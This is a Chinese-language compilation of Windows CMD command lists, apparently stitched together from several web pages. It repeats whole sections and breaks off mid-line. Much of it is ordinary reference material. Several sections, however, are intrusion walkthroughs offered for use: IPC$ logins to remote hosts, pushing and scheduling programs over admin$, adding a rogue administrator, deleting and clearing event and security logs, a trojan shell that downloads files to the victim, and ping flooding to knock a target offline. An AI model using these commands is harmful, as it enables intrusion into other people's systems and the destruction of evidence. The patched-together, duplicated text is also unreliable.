黑客献出防黑必学cmd命令大全集合完整珍藏版

CMD命令大全，史上最全最详细CMD命令：开始－>运行－>键入cmd或command（在命令行里可以看到系统版本、文件系统版本）1. appwiz.cpl：程序和功能2. calc：启动计算器3. certmgr.msc：证书管理实用程序4. charmap：启动字符映射表5. chkdsk.exe：Chkdsk磁盘检查（管理员身份运行命令提示符）6. cleanmgr: 打开磁盘清理工具7. cliconfg：SQL SERVER 客户端网络实用工具8. cmstp：连接管理器配置文件安装程序9. cmd.exe：CMD命令提示符10. 自动关机命令Shutdown -s -t 600：表示600秒后自动关机shutdown -a ：可取消定时关机Shutdown -r -t 600：表示600秒后自动重启rundll32 user32.dll,LockWorkStation：表示锁定计算机11. colorcpl：颜色管理，配置显示器和打印机等中的色彩12. CompMgmtLauncher：计算机管理13. compmgmt.msc：计算机管理14. credwiz：备份或还原储存的用户名和密码15. comexp.msc：打开系统组件服务16. control：控制面版17. dcomcnfg：打开系统组件服务18. Dccw：显示颜色校准19. devmgmt.msc：设备管理器20. desk.cpl：屏幕分辨率21. dfrgui：优化驱动器Windows 7→dfrg.msc：磁盘碎片整理程序22. dialer：电话拨号程序23. diskmgmt.msc：磁盘管理24. dvdplay：DVD播放器25. dxdiag：检查DirectX信息26. eudcedit：造字程序27. eventvwr：事件查看器28. explorer：打开资源管理器29. Firewall.cpl：Windows防火墙30. FXSCOVER：传真封面编辑器31. fsmgmt.msc：共享文件夹管理器32. gpedit.msc：组策略33. hdwwiz.cpl：设备管理器34. inetcpl.cpl：Internet属性35. intl.cpl：区域36. iexpress：木马捆绑工具，系统自带37. joy.cpl：游戏控制器38. logoff：注销命令39. lusrmgr.msc：本地用户和组40. lpksetup：语言包安装/删除向导，安装向导会提示下载语言包41. lusrmgr.msc：本机用户和组42. main.cpl：鼠标属性43. mmsys.cpl：声音44. magnify：放大镜实用程序45. mem.exe：显示内存使用情况（如果直接运行无效，可以先管理员身份运行命令提示符，在命令提示符里输入mem.exe>d:a.txt 即可打开d盘查看a.txt，里面的就是内存使用情况了。

cmd.exe是一个命令扩展接口，外面利用它可以执行系统的环境变量下的任意可执行程序，操作类似与以前的ms-dos，但功能却比ms-dos要强大的多，虽然学习有点抽象，但我们只要把ms-dos的基础打好，也很容易上手，如果各位对dos命令很陌生的话，就先去补习一下dos命令再来看本文，如果文章前那位是位system高手，就请掠过次页吧，好了不多说废话，请看下面：一、外部命令：1、 atmadm.exe：打开ATM调用管理器，-c表示列出所有连接、-s表示只显示统计、-a表示列出所有注册的连接地址。

2、 arp.exe：查看和修改本地ARP（地址解析协议）表项命令，/a 显示当前网络接口和当前的ARP表、/d 删除指定的IP的ARP表、/s 添加有IP地址和MAC地址指定的ARP表。

在使用ARP命令是通常是先PING 对方或网关的IP地址。

3、 attrib.exe：文件属性设置，+代表设置属性、-代表取消属性、/s代表设置当前目录和子目录文件（支持通配符）、/d代表设置文件夹（支持通配符），设置选项如下：a 存档属性、s 系统属性、h 隐藏属性、r 只读属性。

比如给c:\windows所有目录及子目录加系统、隐藏属性，命令如下：attrib +s +dc:\windows\*.* /s /d 。

4、 auditusr.exe：设置每用户审核策略，/is 添加或更改成功策略审核、/if 添加或更改失败策略审核、/r 删除所有安全策略审核、/ra 删除所有用户策略审核、/e 将当前用户策略审核配置导出到文件、/i 从文件导入用户策略审核配置。

5、 blastcln.exe：微软的恶意程序移除工具命令行程序，只有/v参数，运行后会检测系统服务、系统程序、注册表启动项、被病毒破坏或丢失的文件名等等。

检测完毕之后会给出报告。

6、 bootcfg.exe：系统启动项配置程序，考虑到参数众多又对外面无多么大实际作用，大家可以输入bootcfg.exe /?参见其的中文命令参数帮助。

cmd命令大全CMD命令大全。

CMD命令是Windows操作系统中非常重要的一部分，它可以帮助用户完成各种系统管理任务和操作。

本文将为大家详细介绍一些常用的CMD命令，希望能够帮助大家更好地理解和应用这些命令。

1. dir。

dir命令用于列出指定目录中的文件和子目录。

在CMD中输入dir后按回车，系统将列出当前目录下的所有文件和子目录的详细信息，包括文件名、文件大小、创建日期等。

2. cd。

cd命令用于改变当前目录。

在CMD中输入cd加上目标目录的路径，按回车后系统将切换到指定的目录中。

3. mkdir。

mkdir命令用于创建新目录。

在CMD中输入mkdir加上目录名，按回车后系统将在当前目录下创建一个新的子目录。

4. del。

del命令用于删除指定的文件。

在CMD中输入del加上文件名，按回车后系统将删除指定的文件。

5. copy。

copy命令用于复制文件。

在CMD中输入copy加上源文件路径和目标文件路径，按回车后系统将复制源文件到目标路径。

6. move。

move命令用于移动文件。

在CMD中输入move加上源文件路径和目标文件路径，按回车后系统将移动源文件到目标路径。

7. ren。

ren命令用于重命名文件。

在CMD中输入ren加上原文件名和新文件名，按回车后系统将把原文件重命名为新文件名。

8. type。

type命令用于显示文件内容。

在CMD中输入type加上文件名，按回车后系统将显示指定文件的内容。

9. tasklist。

tasklist命令用于显示当前运行的所有进程。

在CMD中输入tasklist，按回车后系统将列出当前所有正在运行的进程的详细信息。

10. taskkill。

taskkill命令用于结束指定的进程。

在CMD中输入taskkill加上进程ID，按回车后系统将结束指定的进程。

11. ipconfig。

ipconfig命令用于显示当前网络配置信息。

在CMD中输入ipconfig，按回车后系统将显示当前计算机的网络配置信息，包括IP地址、子网掩码、网关等。

cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executableactmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口（终端服务）chgusr.exe > 改变用户（终端服务）chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引内容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的！cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的内容＊compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦！dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具edlin.exe > 命令行的文本编辑器（历史悠久啊！）edlin.exe > 命令行的文本编辑器（历史悠久啊！）esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration tool evntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在内存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a network connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote sy stems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态，显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。

网管和黑客都必须知道的命令常用的几条NET 命令：==================================================（与远程主机建立空管连接）net use \\IP 地址\ipc$ "" /use:""（以管理员身份登录远程主机）net use \\IP 地址\ipc$ "密码" /use:"Administrator"（传送文件到远程主机WINNT 目录下）copy 本机目录路径\程序\\IP 地址\admin$（查看远程主机时间）net time \\IP 地址（定时启动某个程序）at \\IP 地址02:18 readme.exe（查看共享）net view \\IP 地址（查看netbios 工作组列表）nbtstat -A IP 地址（将远程主机C盘映射为自己的F 盘）net use f: \\IP 地址\c$ ""/user:"Administrator" （这两条把自己增加到管理员组）：net user 用户名密码/addnet localgroup Administrators 用户名/add（断开连接）net use \\IP 地址\ipc$ /delete=====================================================擦屁屁：del C:\winnt\system32\logfiles\*.*del C:\winnt\system32\config\*.evtdel C:\winnt\system32\dtclog\*.*del C:\winnt\system32\*.logdel C:\winnt\system32\*.txtdel C:\winnt\*.txtdel C:\winnt\*.log============================一、netsvc.exe下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务：netsvc /list \\IP 地址netsvc schedule \\IP 地址/querynetsvc \\IP地址schedule /start二、OpenTelnet.exe远程启动主机的Telnet 服务，并绑定端口到7878，例如：OpenTelnet \\IP 地址用户名密码 1 7878然后就可以telnet 到主机的7878 端口，进入DOS 方式下：telnet IP 地址7878三、winshell.exe一个非常小的木马（不到6K），telnet 到主机的7878 端口，输入密码winshell，当看到CMD>后，可打下面的命令：p Path （查看winshell主程序的路径信息）b reBoot （重新启动机器）d shutDown （关闭机器）s Shell （执行后你就会看到可爱的“C:\>”）x eXit （退出本次登录会话，此命令并不终止winshell的运行）CMD> http://.../srv.exe （通过http 下载其他网站上的文件到运行winshell 的机器上）四、3389 登陆器，GUI 方式登录远程主机的五、elsave.exe事件日志清除工具elsave -s \\IP 地址-l "application" -Celsave -s \\IP 地址-l "system" -Celsave -s \\IP 地址-l "security" -C执行后成功清除应用程序日志，系统日志，安全日志六、hbulot.exe开启win2kserver和winxp的3389 服务hbulot [/r]使用/r 表示安装完成后自动重起目标使设置生效。

CMD常用命令大全（值得收藏) CMD常用命令大全（值得收藏）前言•平常在学校上课忘记带鼠标，触摸板又有点不方便。

cmd 可以解决一大半问题！通过使用窗口命令，实现无鼠标办公！或者你想在朋友面前装个x，不妨运行一下tree •总而言之，cmd命令记一些常用的，还是很有帮助的！一、启动cmd方式1.用户启动，Win+r 输入cmd，Enter2.管理员启动，Win+r 输入cmd，Ctrl+Shift+Enter二、修改背景打开cmd，右击窗口点击属性，可以为cmd命令窗口设置文字与背景样式改成我这种透明、绿色字体是不是酷起来了！（仍万万是壁纸不是shell窗口背景）三、文件夹命令进入文件夹cd D:\typora\file返回上一级cd..跳转到根目录cd \跳转指定路径(假设现在在D:\typora跳转到D:\网页下载)cd D:\网页下载打开文件夹或文件start 文件名字新建文件夹md d:\typora\filemkdir newtest 进入根目录后使用新建空文件cd.> class="token punctuation">.txtcd.> class="token punctuation">.docxcd.> class="token punctuation">.ppttype nul> newtest.txttype nul>.txt新建非空文件echo 文件中的内容>new.txt删除文件(如果是del 文件夹A是删除文件夹A内的所有带后缀的文件，若文件夹A中有文件夹B，文件夹B不会被修改)del class="token punctuation">.txt删除指定后缀的文件del*.txtdel*.docx删除名为file的空文件夹rd file删除名为file的文件夹rd/s D:\file删除file文件夹下的所有文件rd file /s生成目录树,在文件少一些的路径尝试。

cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executable actmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口（终端服务）chgusr.exe > 改变用户（终端服务）chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的！cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的容＊compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦！dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具 edlin.exe > 命令行的文本编辑器（历史悠久啊！）edlin.exe > 命令行的文本编辑器（历史悠久啊！）esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration toolevntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a networ k connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态，显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。

必学cmd命令解析大全本文是小编给大家介绍的cmd命令解析大全，防黑必学，欢迎大家阅读，希望大家多学习。

命令又可分成三类：网络检测(如ping)、网络连接(如telnet)和网络配置(如netsh)。

前面两种相对简单，本文只介绍两个网络配置工具。

自带的关于网络的命令行工具很多，比如大家熟悉的ping,tracert,ipconfig,telnet,ftp,tftp,netstat，还有不太熟悉的nbtstat,pathping,nslookup,finger,route,netsh......这些命令又可分成三类：网络检测(如ping)、网络连接(如telnet)和网络配置(如netsh)。

前面两种相对简单，本文只介绍两个网络配置工具。

Windows脚本很多事用脚本来做是很简洁的。

下面给出几个常用脚本的echo版。

1，显示系统版本@echo for each ps in getobject _ >ps.vbs @echo("winmgmts://./root/cimv2:win32_operatingsystem").instances_ >>ps.vbs @echo wscript.echo ps.caption^&" "^&ps.version:next >>ps.vbs cscript //nologo ps.vbs & del ps.vbs2，列举进程 @echo for each ps in getobject _ >ps.vbs @echo ("winmgmts://./root/cimv2:win32_process").instances_ >>ps.vbs @echo wscript.echo ps.handle^&vbtab^&^&vbtab^&ps.executablepath:ne xt >>ps.vbs cscript //nologo ps.vbs & del ps.vbs3，终止进程 @echo for each ps in getobject _ >pk.vbs @echo ("winmgmts://./root/cimv2:win32_process").instances_ >>pk.vbs @echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs 要终止PID为123的进程，使用如下语法： cscript pk.vbs 123 如果显示一个0，表示终止成功。

用DOS，可别不知道DOS在哪里运行，有好几种方法1.开始菜单---程序---附件---命令提示符2.开始菜单---运行---打命令CMD一、常用DOS命令(1)cd.. cd.. 退到次一级目录cd\ cd\ 退到根目录下的意思cd 文件夹名字cd windows 进入WINDOWS目录(2)md 文件夹名字md win 建立名为win的文件夹(3)rd 文件夹名字rd win 删除名为win的文件夹（前提是win里没有任何文件）(4)copy 路径下文件目标路径copy C:\1\mima.txt C:\2\ 拷贝文件(5)del 目标路径下文件del C:\1\3\TCP.txt 删除文件del c:\1 删除c盘1目录所有文件看见没mima.txt被删除了但是3这个文件夹还没删除只是文件不会删除ghost里其他文件夹里的东西。

(6)dir 文件夹名字或盘符dir c:\windows 查看C盘windows里目录文件----------------------------------------------------------------------------│dir/W：宽屏显示，一排显示5个文件名，而不会显示修改时间，文件大小等信息；││dir/S：显示当前目录及其子目录下所有的文件，││dir/a 查看所有文件包括隐藏文件dir c:\windows /a ││dir/p 分页查看这里的很实用的,大家一定要自己试试│-----------------------------------------------------------------------------(为了节省大家的时间,方框里面的我就不介绍了,大家自己试试)(7)format 盘符格式化硬盘（这个我就不演示了.你问我为什么,汉.........我心疼我的硬盘^_^）(8)ren 文件名文件名改名ren 1.bat 2.bat 将1.bat改名为2.bat 这几个文件我还没创建,现在我们创建一下,好了(9)type 文件名查看文件内容（一般用来看bat或txt文件）(10)cls 清屏（没多大用）二、常用网络DOS命令(11)fport 查看系统端口和端口上运行的程序这个命令我也不知道怎么了,等我查一下用法,发到论坛上,不好意思,(12)netstat -an 查看所有连接本机IP(13)ipconfig /all 查看所有连接本机IP(14)telnet IP 端口连接对方机器某个端口(15)net user 查看本机用户net user 用户名密码/add 建立一个用户net user 用户名/del 删除一个用户(16)net localgroup administrators 用户名/add 把用户添加到管理员net localgroup administrators 用户名/del 把用户从管理员组删除这个就不用演示了,和上面的一样三、批处理文件批处理。

⿊客攻击常⽤CMD命令⼤全⿊客常⽤命令⼤全net user heibai lovechina /add 加⼀个heibai的⽤户密码为lovechinanet localgroup Administrators heibai /add 把他加⼊Administrator组net start telnet 开对⽅的TELNET服务net use z:\127.0.0.1c$ 映射对⽅的C盘net use \\ip\ipc$ " " /user:" " 建⽴IPC空链接net use \\ip\ipc$ "密码" /user:"⽤户名" 建⽴IPC⾮空链接net use h: \\ip\c$ "密码" /user:"⽤户名" 直接登陆后映射对⽅C：到本地为H:net use h: \\ip\c$ 登陆后映射对⽅C：到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对⽅到本地的为H:的映射net user ⽤户名　密码　/add 建⽴⽤户net user 查看有哪些⽤户net user 帐户名查看帐户的属性net user guest /active:yes 将Guest⽤户激活net user guest lovechina 把guest的密码改为lovechinanet user ⽤户名 /delete 删掉⽤户net user guest/time:m-f,08:00-17:00 表⽰guest⽤户登录时间为周⼀⾄周五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表⽰guest⽤户登录时间为周⼀4:00/17:00,周⼆13:00/15:00,周三⾄周五8:00/17:00.net user guest/time:all表⽰没有时间限制.net user guest/time 表⽰guest⽤户永远不能登录. 但是只能限制登陆时间，不是上⽹时间net time \\127.0.0.1 得到对⽅的时间，get c:\index.htm d:\ 上传的⽂件是INDEX.HTM，它位于C:\下，传到对⽅D:\copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘net localgroup administrators ⽤户名 /add 把“⽤户”添加到管理员中使其具有管理员权限,注意：administrator后加s⽤复数net start 查看开启了哪些服务net start 服务名　开启服务；(如:net start telnet， net start schedule)net stop 服务名停⽌某服务net time \\⽬标ip 查看对⽅时间net time \\⽬标ip /set 设置本地计算机时间与“⽬标IP”主机的时间同步,加参数/yes可取消确认信息 net view 查看本地局域⽹内开启了哪些共享net view \\ip 查看对⽅局域⽹内开启了哪些共享net config 显⽰系统⽹络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "⽂本信息" 向对⽅发信息net ver 局域⽹内正在使⽤的⽹络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C：共享net user guest 12345 ⽤guest⽤户登陆后⽤将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端⼝,常⽤netstat -annetstat -n 查看端⼝的⽹络连接情况，常⽤netstat -annetstat -v 查看正在进⾏的⼯作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使⽤情况（查看tcp/ip协议使⽤情况）netstat -s 查看正在使⽤的所有协议使⽤情况nbtsta* -* ** 对⽅136到139其中⼀个端⼝开了的话，就可查看对⽅最近登陆的⽤户名（03前的为⽤户名）-注意：参数-A要⼤写tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”⽤于设置超时间隔。

最全CMD指令大全-cmd最恐怖指令-cmd最恐怖指令CMD运行指令开始→运行→CMD→键入以下命令即可: ASSOC显示或修改文件扩展名关联。

AT计划在计算机上运行的命令和程序。

ATTRIB显示或更改文件属性。

BREAK设置或清除扩展式CTRL+C检查。

CACLS显示或修改文件的访问控制列表(ACLs)。

CALL从另一个批处理程序调用这一个。

CD显示当前目录的名称或将其更改。

CHCP显示或设置活动代码页数。

CHDIR显示当前目录的名称或将其更改。

cleanmgr–打开磁盘清理工具compmgmt.msc－－－计算机管理conf—-启动netmeetingcharmap–－启动字符映射表calc—-启动计算器chkdsk.exe–－Chkdsk磁盘检查cmd.exe–－CMD命令提示符certmgr.msc–证书管理实用程序cliconfg–SQLSERVER客户端网络实用程序Clipbrd–－剪贴板查看器ciadv.msc–－－索引服务程序dvdplay–－DVD播放器diskmgmt.msc－－－磁盘管理实用程序dfrg.msc–磁盘碎片整理程序devmgmt.msc－－－设备管理器drwtsn32–－－系统医生dxdiag–－－检查DirectX信息dcomcnfg–打开系统组件服务ddeshare–打开DDE共享设置explorer–打开资源管理器eventvwr–事件查看器eudcedit–造字程序fsmgmt.msc–－共享文件夹管理器gpedit.msc–－组策略iexpress–***工具，系统自带logoff–注销命令lusrmgr.msc–本机用户和组mstsc–远程桌面连接Msconfig.exe－－－系统配置实用程序mem.exe–－显示内存使用情况（如果直接运行无效，可以先运行cmd，在命令提示符里输入mem.exe>d:a.txt即可打开d盘查看a.txt，里面的就是内存使用情况了。

玩电脑必须掌握的八个cmd命令一、ping它是用来检查网络是否通畅或者网络连接速度的命令。

作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。

下面就来看看它的一些常用的操作。

先看看帮助吧，在DOS窗口中键入：ping /? 回车。

所示的帮助画面。

在此，我们只掌握一些基本的很有用的参数就可以了（下同）。

-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。

试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。

-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。

结合上面介绍的-t参数一起使用，会有更好的效果哦。

-n 定义向目标IP发送数据包的次数，默认为3次。

如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。

说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如\"ping IP -t -n 3\"，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。

另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的 IP。

下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小。

从TTL的返回值可以初步判断被 ping主机的操作系统，之所以说\"初步判断\"是因为这个值是可以修改的。

Nslookup-------IP地址侦测器logoff---------注销命令lusrmgr.msc----本机用户和组services.msc---本地服务设置cleanmgr-------垃圾整理compmgmt.msc---计算机管理charmap--------启动字符映射表calc-----------启动计算器devmgmt.msc--- 设备管理器drwtsn32------ 系统医生rononce -p ----15秒关机regedt32-------注册表编辑器rsop.msc-------组策略结果集regedit.exe----注册表perfmon.msc----计算机性能监测程序sfc /scannow-----扫描错误并复原taskmgr-----任务管理器（2000/xp/2003winver---------检查Windows版本wmimgmt.msc----打开windows管理体系结构(WMI) wupdmgr--------windows更新程序wscript--------windows脚本宿主设置write----------写字板winmsd---------系统信息wiaacmgr-------扫描仪和照相机向导winchat--------XP自带局域网聊天mem.exe--------显示内存使用情况Msconfig.exe---系统配置实用程序mplayer2-------简易widnows media playermspaint--------画图板mstsc----------远程桌面连接mplayer2-------媒体播放机magnify--------放大镜实用程序mmc------------打开控制台mobsync--------同步命令dxdiag---------检查DirectX信息drwtsn32------ 系统医生devmgmt.msc--- 设备管理器dfrg.msc-------磁盘碎片整理程序diskmgmt.msc---磁盘管理实用程序dcomcnfg-------打开系统组件服务ddeshare-------打开DDE共享设置net stop 